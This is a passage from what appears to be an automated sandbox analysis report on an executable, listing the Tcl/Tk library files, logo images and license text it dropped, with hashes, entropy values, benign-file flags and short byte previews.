Entropy (8bit):	5.235207715374815
Encrypted:	false
SSDEEP:	768:gGTVOEcRWsdEmhp6k/GLrPMlK3pJr/IbYDGDMtBF2Fz6fsFA/fSvqHWukLI2d0Nr:gGTVOEcRWsdEvLrPJ5Jr/IbYDGDMtBFh
MD5:	45175418859AF67FE417BD0A053DB6E5
SHA1:	2B499B7C4EBC8554ECC07B8408632CAF407FB6D5
SHA-256:	F3E77FD94198EC4783109355536638E9162F9C579475383074D024037D1797D3
SHA-512:	114A59FD6B99FFD628BA56B8E14FB3B59A0AB6E752E18DEA038F85DBC072BF98492CE9369D180C169EDE9ED2BD521D8C0D607C5E4988F2C83302FC413C6D6A4C
Malicious:	false
Preview:	%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL/TK LOGO.ILLUS).%%CreationDate: (8/1/96) (4:58 PM).%%BoundingBox: 251 331 371 512.%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%DocumentCustomColors: (TCL RED).%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Level 2 Emul

C:\Users\user\Desktop\tk\images\logo100.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2341
Entropy (8bit):	6.9734417899888665
Encrypted:	false
SSDEEP:	48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
MD5:	FF04B357B7AB0A8B573C10C6DA945D6A
SHA1:	BCB73D8AF2628463A1B955581999C77F09F805B8
SHA-256:	72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
SHA-512:	10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
Malicious:	false
Preview:	GIF89aD.d...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....D.d........H......\...z..Ht@Q...92.p...z.$.@@.E..u.Y.2..0c..q.cB.,[..... ..1..qbM.2~].....s...S.@.L.j..#..\......h..........].D(..m......@.Z....oO...3=.c...G".(..pL...q]..%....[...#...+...X.h....^.....

C:\Users\user\Desktop\tk\images\logo64.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1670
Entropy (8bit):	6.326462043862671
Encrypted:	false
SSDEEP:	48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
MD5:	B226CC3DA70AAB2EBB8DFFD0C953933D
SHA1:	EA52219A37A140FD98AEA66EA54685DD8158D9B1
SHA-256:	138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
SHA-512:	3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
Malicious:	false
Preview:	GIF89a+.@...............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....+.@........H. .z..(tp......@...92....#. A.......C.\.%...)Z..1a.8s..W/..@....3..C...y$.GW.....5.FU..j..;.F(Pc+W.-..X.D-[.*g....F..`.:mkT...Lw...A/.....u.7p..a..9P.....q2..Xg..G....3}AKv.\.d..yL.>..1.#

C:\Users\user\Desktop\tk\images\logoLarge.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11000
Entropy (8bit):	7.88559092427108
Encrypted:	false
SSDEEP:	192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
MD5:	45D9B00C4CF82CC53723B00D876B5E7E
SHA1:	DDD10E798AF209EFCE022E97448E5EE11CEB5621
SHA-256:	0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
SHA-512:	6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
Malicious:	false
Preview:	GIF89ab.................f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3.............f..3..........f.3...f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3.............f..3............f..3.............f..3....f..f.f..ff.f3.f..3..3.3..3f.33.3...........f..3...f..f..f..f.ff.3f..f..f..f.f.ff.3f..f..f..f..f.ff.3f..ff.ff.ff.fffff3ff.f3.f3.f3.f3ff33f3.f..f..f..f.ff.3f..3..3..3..3.f3.33..3..3..3.3.f3.33..3..3..3..3.f3.33..3f.3f.3f.3ff3f33f.33.33.33.33f33333.3..3..3..3.f3.33.............f..3.............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3...............w..U..D..".....................w..U..D..".....................w..U..D..".................wwwUUUDDD"""......,....b..........H......\....#J.H....3j.... '.;p....(.8X..^.0c.I...z8O.\.....:....$..Fu<8`...P.>%I.gO.C.h-..+.`....@..h....dJ.?...K...H.,U.._.#...g..[.^.x.....J.L.!.'........=+eZ..i..ynF.8...].y\|..m.

C:\Users\user\Desktop\tk\images\logoMed.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3889
Entropy (8bit):	7.425138719078912
Encrypted:	false
SSDEEP:	48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
MD5:	BD12B645A9B0036A9C24298CD7A81E5A
SHA1:	13488E4F28676F1E0CE383F80D13510F07198B99
SHA-256:	4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
SHA-512:	F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
Malicious:	false
Preview:	GIF87ax............................................................................z.....{..o.....m..b...`{.X....vy...hk.Um.N...I`.D..Z^.LP.?R.;!....?C.5C.3#.l..,6.&.15...`..#(.If.y.....l...._..#/...Hm.>_.y..4R.k..#6..._......w..K.^.."<.....G{.w..3_."C.Q..F....v..!K...v.2m.)_.[..!R.u.1t.g..)f. X.O..E..1z.g. _.Z..D..:..0..Z.. f.D..0..'z..m.N..C../.z.svC.q/.m.ze7.\..P..I..1%.,...............................................................................................................................................................................................................................................................................................................................................................................................,....x..........H.......D..!...7.PAQ...._l8.... C.<.a...*.x....0q.. ..M.%.<.HBe.@.....Q..7..XC..P..<z3..X...P.jA.%'@.J.lV.......R.,..+....t....7h.....(..a...+^.'..7..L.....V...s..$....a.....8`.9..}K......

C:\Users\user\Desktop\tk\images\pwrdLogo.eps Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27809
Entropy (8bit):	5.331778921404698
Encrypted:	false
SSDEEP:	768:geQTVOEcRWsdEmhp6k/GLrPMlK3pJrNIbYDGDMtBgu2Fz6lR5G/r+FWaGK:gnTVOEcRWsdEvLrPJ5JrNIbYDGDMtB9L
MD5:	BA1051DBED2B8676CAA24593B88C91B2
SHA1:	8A58FC19B20BFDC8913515D9B32CCBF8ACF92344
SHA-256:	2944EBC4AF1894951BF9F1250F4E6EDF811C2183745950EA9A8A926715882CF7
SHA-512:	4260CEBA7DA9463F32B0C76A2AC19D2B20C8FE48CFBA3DC7AF748AAE15FA25DCBDA085072DF7EFC8F4B4F304C7ED166FE9F93DC903E32FA1874E82D59E544DEF
Malicious:	false
Preview:	%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL PWRD LOGO.ILLUS).%%CreationDate: (8/1/96) (4:59 PM).%%BoundingBox: 242 302 377 513.%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Le

C:\Users\user\Desktop\tk\images\pwrdLogo100.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1615
Entropy (8bit):	7.461273815456419
Encrypted:	false
SSDEEP:	48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
MD5:	DBFAE61191B9FADD4041F4637963D84F
SHA1:	BD971E71AE805C2C2E51DD544D006E92363B6C0C
SHA-256:	BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
SHA-512:	ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
Malicious:	false
Preview:	GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v\|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......\|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8OZ.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.\|..pf!..&.......8.#.8.......J>. .t..h6(........#..0.A...!..)...x..u.Z....%..H............`......\|.....1.......&.....T...f.l...

C:\Users\user\Desktop\tk\images\pwrdLogo150.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2489
Entropy (8bit):	7.708754027741608
Encrypted:	false
SSDEEP:	48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
MD5:	711F4E22670FC5798E4F84250C0D0EAA
SHA1:	1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
SHA-256:	5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
SHA-512:	220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
Malicious:	false
Preview:	GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>\|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..

C:\Users\user\Desktop\tk\images\pwrdLogo175.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2981
Entropy (8bit):	7.758793907956808
Encrypted:	false
SSDEEP:	48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
MD5:	DA5FB10F4215E9A1F4B162257972F9F3
SHA1:	8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
SHA-256:	62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
SHA-512:	990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
Malicious:	false
Preview:	GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....0p}..KP?c.\@KW.S(..M..B.....-q...S2....,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.4..(..........F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..

C:\Users\user\Desktop\tk\images\pwrdLogo200.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3491
Entropy (8bit):	7.790611381196208
Encrypted:	false
SSDEEP:	96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
MD5:	A5E4284D75C457F7A33587E7CE0D1D99
SHA1:	FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
SHA-256:	BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
SHA-512:	4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
Malicious:	false
Preview:	GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R......J.p.A.t...$A...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y135.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. .....Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'\|..M9..."...,.......

C:\Users\user\Desktop\tk\images\pwrdLogo75.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1171
Entropy (8bit):	7.289201491091023
Encrypted:	false
SSDEEP:	24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
MD5:	7013CFC23ED23BFF3BDA4952266FA7F4
SHA1:	E5B1DED49095332236439538ECD9DD0B1FD4934B
SHA-256:	462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
SHA-512:	A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
Malicious:	false
Preview:	GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .\|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N\|...f..J.x... P&.\|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..\|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......

C:\Users\user\Desktop\tk\images\tai-ku.gif Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5473
Entropy (8bit):	7.754239979431754
Encrypted:	false
SSDEEP:	96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
MD5:	048AFE69735F6974D2CA7384B879820C
SHA1:	267A9520C4390221DCE50177E789A4EBD590F484
SHA-256:	E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
SHA-512:	201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
Malicious:	false
Preview:	GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa.....p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..\|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......EfY3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S

C:\Users\user\Desktop\tk\license.terms Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2208
Entropy (8bit):	5.100926243789827
Encrypted:	false
SSDEEP:	48:ox3uZcRTvy3DauG4+bHnr32s3eGw8YKxPiOXR3ojdS+mFf:hcFaz+bL3e8n3XR3ojdtOf
MD5:	8B74B116CD5C4334D08F62B9265A482D
SHA1:	D1C745B315BF5B14BBD61C002BD6BE33426EA9B4
SHA-256:	4D337CAE08517060A21E404CDBACE9C4EA191E57BA0638864473F01E67C9F457
SHA-512:	0E52ACED6739375F3D1A3D33333292F0DB03249AE138CCFE96437C6908D1594CA311587542FCEC5ADBC254BB5D7C1BF3976352AB86A2B23DBAB0D9BA05100470
Malicious:	false
Preview:	This software is copyrighted by the Regents of the University of.California, Sun Microsystems, Inc., and other parties. The following.terms apply to all files associated with the software unless explicitly.disclaimed in individual files...The authors hereby grant permission to use, copy, modify, distribute,.and license this software and its documentation for any purpose, provided.that existing copyright notices are retained in all copies and that this.notice is included verbatim in any distributions. No written agreement,.license, or royalty fee is required for any of the authorized uses..Modifications to this software may be copyrighted by their authors.and need not follow the licensing terms described here, provided that.the new terms are clearly indicated on the first page of each file where.they apply...IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY.FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES.ARISING OUT OF THE USE OF THIS SOFTWARE, IT

C:\Users\user\Desktop\tk\listbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14052
Entropy (8bit):	4.8837226166346435
Encrypted:	false
SSDEEP:	384:ZUjtAc1YusFvEgM6UzcDkHjNw8iSdy+1a22YDKD:Z+gTUjjW8TQcK
MD5:	E373CE20E1AAA8F136E77D9425E42D2C
SHA1:	4B39C9C2B8F497B4D9702A98B695C1A50EFFF8D7
SHA-256:	2FADC35CDB7AC4F7AF1D6F0A629199C2261882A6DA86BFA6A3768BAE6B4095D3
SHA-512:	ECC86EE52C9F63B9B748E6722ECE6318B4BEC5F11159C3B9FE0ED3E1D15AC040D127D845535D9C941287308442C894313516C7267E16484F2DF69E990993DDAD
Malicious:	false
Preview:	# listbox.tcl --.#.# This file defines the default bindings for Tk listbox widgets.# and provides procedures that help in implementing those bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#--------------------------------------------------------------------------.# tk::Priv elements used in this file:.#.# afterId -..Token returned by "after" for autoscanning..# listboxPrev -..The last element to be selected or deselected.#...during a selection operation..# listboxSelection -.All of the items that were selected before the.#...current selection operation (such as a mouse.#...drag) started; used to cancel an operation..#--------------------------------------------------------------------------..#------------------------------------

C:\Users\user\Desktop\tk\menu.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	37880
Entropy (8bit):	4.873368915532052
Encrypted:	false
SSDEEP:	768:0K5IGCwnC71JtVbQDFTo06WpSCeihpzuxdNQYEuH9DAWJ:0K5d3CDs69WuxdCYxHSo
MD5:	BA3790A18954A9F00637EA7FDC5FF607
SHA1:	6B157DFB806137645E2423699B500F34830E300E
SHA-256:	55F0A145F287E41141DED20B2DCF5AF244C851E8400A61A06FE5C61CE518044E
SHA-512:	0B3560A13CF61D1B9AF88F9E0444304E2B846BC62E37214C5693E96975D23B2A31412D63727F80986EA585F3C13F3B37FE0D53E79CBE02912F84A4510113FA95
Malicious:	false
Preview:	# menu.tcl --.#.# This file defines the default bindings for Tk menus and menubuttons..# It also implements keyboard traversal of menus and implements a few.# other utility procedures related to menus..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998-1999 by Scriptics Corporation..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# cursor -..Saves the -cursor option for the posted menubutton..# focus -..Saves the focus during a menu selection operation..#...Focus gets restored here when the menu is unposted..# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if.#...tk::Priv(oldGrab) is non-empty, then tk::Pr

C:\Users\user\Desktop\tk\mkpsenc.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	27195
Entropy (8bit):	4.814848179189606
Encrypted:	false
SSDEEP:	768:PbIvXHip4HOvtmXSckY6hwE9iM/Q9NSF7HBZ2l0K:PMXHip4HOvtmXSck5wE9iMMSHK
MD5:	A9465C342EEA4655624C5330BED9FA47
SHA1:	BC3B0A948F543C9365E0602099A9CB470066B725
SHA-256:	C468D571980AA994F1475146E3D755F614ED4EED9B3E429557EBB722E4CA8566
SHA-512:	868C3F29686429EAA3C3A25A74AD4C7805607CAA1A505464B8818150B44B6EE96CAA7E8785A452BB75483E8D3658B5B1876250D5144B4ED97908D13E7EEF9DDD
Malicious:	false
Preview:	# mkpsenc.tcl --.#.# Creates Postscript encoding vector for given encoding.# ..proc ::tk::CreatePostscriptEncoding {encoding} {. # now check for known. Even if it is known, it can be other. # than we need. GhostScript seems to be happy with such approach. set result "/CurrentEncoding \[\n". for {set i 0} {$i<256} {incr i 8} {. for {set j 0} {$j<8} {incr j} {.. set enc [encoding convertfrom $encoding [format %c [expr {$i+$j}]]].. if {[catch {format %04X [scan $enc %c]} hexcode]} {set hexcode {}}.. if [info exists ::tk::psglyphs($hexcode)] {...append result "/$::tk::psglyphs($hexcode)".. } else {...append result "/space".. }..}..append result "\n". }. append result "\] def\n". return $result.}..# List of adobe glyph names. Converted from glyphlist.txt, downloaded.# from Adobe..namespace eval ::tk {.array set psglyphs {. 0020 space. 0021 exclam. 0022 quotedbl. 0023 numbersign. 0024 dollar. 0025 percent. 0026 ampersand. 0027 quotes

C:\Users\user\Desktop\tk\msgbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	17035
Entropy (8bit):	4.710609471760674
Encrypted:	false
